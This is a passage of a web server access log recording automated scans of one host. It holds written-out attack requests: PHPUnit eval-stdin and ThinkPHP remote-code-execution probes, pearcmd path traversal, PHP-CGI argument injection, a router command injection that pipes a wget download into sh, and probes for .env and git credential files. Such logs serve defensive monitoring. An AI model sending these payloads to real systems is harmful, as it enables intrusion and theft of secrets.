(Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36" "-" +[18/Jan/2026:13:07:13 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 154.92.16.80] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:13:07:13 +0000] 404 - GET http profibot.direct.quickconnect.to "/sito/wp-includes/wlwmanifest.xml" [Client 34.186.83.175] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36" "-" +[18/Jan/2026:13:07:14 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 34.186.83.175] [Length 0] [Gzip -] "-" "-" +[18/Jan/2026:13:07:14 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 154.92.16.80] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:13:07:18 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/src/Util/PHP/eval-stdin.php" [Client 154.92.16.80] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:13:07:21 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/Util/PHP/eval-stdin.php" [Client 154.92.16.80] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:13:07:24 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" [Client 154.92.16.80] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:13:07:25 +0000] 404 - GET http 91.82.83.208 "/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 154.92.16.80] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:13:07:25 +0000] 404 - GET http 91.82.83.208 "/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 154.92.16.80] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:13:07:27 +0000] 404 - GET http 91.82.83.208 "/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 154.92.16.80] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:13:07:27 +0000] 404 - GET http 91.82.83.208 "/phpunit/src/Util/PHP/eval-stdin.php" [Client 154.92.16.80] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:13:07:35 +0000] 404 - GET http 91.82.83.208 "/phpunit/Util/PHP/eval-stdin.php" [Client 154.92.16.80] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:13:07:36 +0000] 404 - GET http 91.82.83.208 "/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 154.92.16.80] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:13:08:07 +0000] 404 - GET http 91.82.83.208 "/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 154.92.16.80] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:13:08:08 +0000] 404 - GET http 91.82.83.208 "/lib/phpunit/src/Util/PHP/eval-stdin.php" [Client 154.92.16.80] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:13:08:10 +0000] 404 - GET http 91.82.83.208 "/lib/phpunit/Util/PHP/eval-stdin.php" [Client 154.92.16.80] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:13:08:10 +0000] 404 - GET http 91.82.83.208 "/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 154.92.16.80] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:13:08:14 +0000] 404 - GET http 91.82.83.208 "/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 154.92.16.80] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:13:08:16 +0000] 404 - GET http 91.82.83.208 "/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 154.92.16.80] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:13:08:17 +0000] 404 - GET http 91.82.83.208 "/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 154.92.16.80] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:13:08:17 +0000] 404 - GET http 91.82.83.208 "/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 154.92.16.80] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:13:08:20 +0000] 404 - GET http 91.82.83.208 "/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 154.92.16.80] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:13:08:21 +0000] 404 - GET http 91.82.83.208 "/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 154.92.16.80] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:13:08:21 +0000] 404 - GET http 91.82.83.208 "/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 154.92.16.80] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:13:08:21 +0000] 404 - GET http 91.82.83.208 "/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 154.92.16.80] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:13:08:22 +0000] 404 - GET http 91.82.83.208 "/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 154.92.16.80] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:13:08:23 +0000] 404 - GET http 91.82.83.208 "/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 154.92.16.80] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:13:08:23 +0000] 404 - GET http 91.82.83.208 "/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 154.92.16.80] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:13:08:24 +0000] 404 - GET http 91.82.83.208 "/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 154.92.16.80] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:13:08:26 +0000] 404 - GET http 91.82.83.208 "/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 154.92.16.80] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:13:08:27 +0000] 404 - GET http 91.82.83.208 "/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 154.92.16.80] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:13:08:28 +0000] 404 - GET http 91.82.83.208 "/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 154.92.16.80] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:13:08:32 +0000] 404 - GET http 91.82.83.208 "/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 154.92.16.80] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:13:08:33 +0000] 404 - GET http 91.82.83.208 "/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 154.92.16.80] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:13:08:40 +0000] 404 - GET http 91.82.83.208 "/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 154.92.16.80] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:13:08:41 +0000] 404 - GET http 91.82.83.208 "/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 154.92.16.80] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:13:08:42 +0000] 404 - GET http 91.82.83.208 "/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 154.92.16.80] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:13:08:44 +0000] 404 - GET http 91.82.83.208 "/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 154.92.16.80] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:13:08:44 +0000] 404 - GET http 91.82.83.208 "/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 154.92.16.80] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:13:08:45 +0000] 404 - GET http 91.82.83.208 "/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 154.92.16.80] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:13:08:46 +0000] 404 - GET http 91.82.83.208 "/public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 154.92.16.80] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:13:08:46 +0000] 404 - GET http 91.82.83.208 "/admin/config.php" [Client 91.232.238.112] [Length 150] [Gzip -] "xfa1" "-" +[18/Jan/2026:13:08:47 +0000] 403 - GET http 91.82.83.208 "/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/+/tmp/index1.php" [Client 154.92.16.80] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:13:08:48 +0000] 403 - GET http 91.82.83.208 "/index.php?lang=../../../../../../../../tmp/index1" [Client 154.92.16.80] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:13:08:55 +0000] 404 - GET http 91.82.83.208 "/containers/json" [Client 154.92.16.80] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:13:10:49 +0000] 404 - GET http 91.82.83.208 "/.git/credentials" [Client 195.178.110.246] [Length 183] [Gzip 3.21] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Falkon/3.0.0 Chrome/65.0.3325.230 Safari/537.36" "-" +[18/Jan/2026:13:20:42 +0000] 200 - GET http 91.82.83.208 "/" [Client 43.167.241.46] [Length 568] [Gzip 1.86] "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-" +[18/Jan/2026:13:21:52 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:13:22:29 +0000] 405 - POST http 91.82.83.208 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[18/Jan/2026:13:22:54 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:13:31:36 +0000] 400 - GET http 91.82.83.208 "/.env" [Client 209.38.90.125] [Length 252] [Gzip -] "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);" "-" +[18/Jan/2026:13:31:37 +0000] 400 - GET http 91.82.83.208 "/.git/config" [Client 209.38.90.125] [Length 252] [Gzip -] "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);" "-" +[18/Jan/2026:13:36:06 +0000] 200 - GET http www.pornhub.com "/" [Client 43.250.53.36] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[18/Jan/2026:13:37:24 +0000] 404 - GET http 91.82.83.208 "/geoserver/wfs?request=ListStoredQueries&service=wfs&version=2.0.0" [Client 204.76.203.8] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[18/Jan/2026:13:37:26 +0000] 400 - - http localhost "-" [Client 20.118.32.39] [Length 154] [Gzip -] "-" "-" +[18/Jan/2026:13:43:08 +0000] 400 - GET http 91.82.83.208 "/" [Client 185.242.226.107] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" "-" +[18/Jan/2026:13:48:54 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:13:49:43 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:13:51:55 +0000] 404 - GET http 91.82.83.208 "/login" [Client 193.142.146.230] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[18/Jan/2026:13:59:37 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:14:00:49 +0000] 200 - GET http 91.82.83.208 "/" [Client 218.172.26.137] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115." "-" +[18/Jan/2026:14:10:07 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:14:10:12 +0000] 200 - GET http 91.82.83.208 "/" [Client 87.121.84.38] [Length 1033] [Gzip -] "-" "-" +[18/Jan/2026:14:11:44 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:14:15:17 +0000] 200 - GET http 91.82.83.208 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:14:15:21 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 8.210.123.17] [Length 154] [Gzip -] "-" "-" +[18/Jan/2026:14:18:44 +0000] 404 - GET http 91.82.83.208 "/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//0.0.0.0/router.tplink.sh%20-O-%7Csh)" [Client 221.159.119.6] [Length 150] [Gzip -] "-" "-" +[18/Jan/2026:14:18:44 +0000] 404 - GET http 91.82.83.208 "/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//0.0.0.0/router.tplink.sh%20-O-%7Csh)" [Client 221.159.119.6] [Length 150] [Gzip -] "-" "-" +[18/Jan/2026:14:27:09 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 5.61.209.92] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:14:36:34 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 136.114.76.192] [Length 0] [Gzip -] "-" "-" +[18/Jan/2026:14:38:29 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:14:40:37 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 23.94.162.106] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:14:48:08 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:14:53:27 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:14:54:44 +0000] 404 - GET http profibot.direct.quickconnect.to "/.env" [Client 91.244.197.69] [Length 122] [Gzip 1.35] "python-requests/2.32.4" "-" +[18/Jan/2026:15:01:15 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:15:02:46 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:15:26:26 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:15:29:18 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 68.183.234.194] [Length 154] [Gzip -] "-" "-" +[18/Jan/2026:15:29:19 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 68.183.234.194] [Length 154] [Gzip -] "-" "-" +[18/Jan/2026:15:29:20 +0000] 404 - POST http 91.82.83.208 "/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 68.183.234.194] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:15:29:21 +0000] 405 - POST http 91.82.83.208 "/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 68.183.234.194] [Length 154] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:15:29:21 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 68.183.234.194] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:15:29:23 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 68.183.234.194] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:15:29:23 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/src/Util/PHP/eval-stdin.php" [Client 68.183.234.194] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:15:29:24 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/Util/PHP/eval-stdin.php" [Client 68.183.234.194] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:15:29:25 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" [Client 68.183.234.194] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:15:29:26 +0000] 404 - GET http 91.82.83.208 "/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 68.183.234.194] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:15:29:27 +0000] 404 - GET http 91.82.83.208 "/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 68.183.234.194] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:15:29:27 +0000] 404 - GET http 91.82.83.208 "/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 68.183.234.194] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:15:29:28 +0000] 404 - GET http 91.82.83.208 "/phpunit/src/Util/PHP/eval-stdin.php" [Client 68.183.234.194] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:15:29:29 +0000] 404 - GET http 91.82.83.208 "/phpunit/Util/PHP/eval-stdin.php" [Client 68.183.234.194] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:15:29:29 +0000] 404 - GET http 91.82.83.208 "/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 68.183.234.194] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:15:29:30 +0000] 404 - GET http 91.82.83.208 "/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 68.183.234.194] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:15:29:31 +0000] 404 - GET http 91.82.83.208 "/lib/phpunit/src/Util/PHP/eval-stdin.php" [Client 68.183.234.194] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:15:29:32 +0000] 404 - GET http 91.82.83.208 "/lib/phpunit/Util/PHP/eval-stdin.php" [Client 68.183.234.194] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:15:29:33 +0000] 404 - GET http 91.82.83.208 "/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 68.183.234.194] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:15:29:34 +0000] 404 - GET http 91.82.83.208 "/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 68.183.234.194] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:15:29:35 +0000] 404 - GET http 91.82.83.208 "/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 68.183.234.194] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:15:29:36 +0000] 404 - GET http 91.82.83.208 "/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 68.183.234.194] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:15:29:36 +0000] 404 - GET http 91.82.83.208 "/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 68.183.234.194] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:15:29:37 +0000] 404 - GET http 91.82.83.208 "/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 68.183.234.194] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:15:29:38 +0000] 404 - GET http 91.82.83.208 "/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 68.183.234.194] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:15:29:39 +0000] 404 - GET http 91.82.83.208 "/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 68.183.234.194] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:15:29:40 +0000] 404 - GET http 91.82.83.208 "/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 68.183.234.194] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:15:29:41 +0000] 404 - GET http 91.82.83.208 "/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 68.183.234.194] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:15:29:42 +0000] 404 - GET http 91.82.83.208 "/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 68.183.234.194] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:15:29:43 +0000] 404 - GET http 91.82.83.208 "/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 68.183.234.194] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:15:29:44 +0000] 404 - GET http 91.82.83.208 "/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 68.183.234.194] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:15:29:45 +0000] 404 - GET http 91.82.83.208 "/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 68.183.234.194] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:15:29:46 +0000] 404 - GET http 91.82.83.208 "/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 68.183.234.194] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:15:29:47 +0000] 404 - GET http 91.82.83.208 "/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 68.183.234.194] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:15:29:48 +0000] 404 - GET http 91.82.83.208 "/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 68.183.234.194] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:15:29:49 +0000] 404 - GET http 91.82.83.208 "/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 68.183.234.194] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:15:29:49 +0000] 404 - GET http 91.82.83.208 "/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 68.183.234.194] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:15:29:50 +0000] 404 - GET http 91.82.83.208 "/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 68.183.234.194] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:15:29:51 +0000] 404 - GET http 91.82.83.208 "/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 68.183.234.194] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:15:29:52 +0000] 404 - GET http 91.82.83.208 "/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 68.183.234.194] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:15:29:53 +0000] 404 - GET http 91.82.83.208 "/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 68.183.234.194] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:15:29:54 +0000] 404 - GET http 91.82.83.208 "/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 68.183.234.194] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:15:29:54 +0000] 404 - GET http 91.82.83.208 "/public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 68.183.234.194] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:15:29:55 +0000] 403 - GET http 91.82.83.208 "/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/+/tmp/index1.php" [Client 68.183.234.194] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:15:29:56 +0000] 403 - GET http 91.82.83.208 "/index.php?lang=../../../../../../../../tmp/index1" [Client 68.183.234.194] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:15:29:57 +0000] 404 - GET http 91.82.83.208 "/containers/json" [Client 68.183.234.194] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:15:32:20 +0000] 400 - GET http 91.82.83.208 "/" [Client 172.202.118.119] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" +[18/Jan/2026:15:32:21 +0000] 400 - - http localhost "-" [Client 172.202.118.119] [Length 154] [Gzip -] "-" "-" +[18/Jan/2026:15:33:09 +0000] 404 - GET http 91.82.83.208 "/.git/config" [Client 23.176.184.61] [Length 150] [Gzip -] "fastscan/1.0" "-" +[18/Jan/2026:15:38:19 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:15:44:22 +0000] 200 - GET http 91.82.83.208 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:15:50:48 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like 